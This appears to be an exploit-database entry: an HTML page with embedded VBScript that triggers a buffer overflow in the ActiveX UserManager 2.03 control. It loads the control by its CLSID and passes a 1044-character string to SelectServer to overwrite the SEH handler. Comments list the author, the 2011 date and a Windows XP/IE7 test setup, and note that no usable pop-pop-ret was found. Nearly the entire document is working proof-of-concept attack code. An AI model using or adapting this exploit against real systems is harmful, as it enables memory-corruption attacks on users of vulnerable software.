Exploit Code
<html> <object classid='clsid:E5D2CE27-5FA0-11D2-A666-204C4F4F5020' id='target'></object> <script language='vbscript'> ' Exploit Title: ActiveX UserManager 2.03 Buffer Overflow ' Date: January 16, 2011 ' Author: Blake ' Software Link: http://www.brothersoft.com/activex-usermanager-14519.html ' Version: 2.03 ' Tested on: Windows XP SP3 / IE7 in VirtualBox ' Overwrites SEH with 00410041 but I could not find a useable pop pop ret arg1=String(1044, "A") arg2=True exploit = arg1 target.SelectServer exploit ,arg2 </script>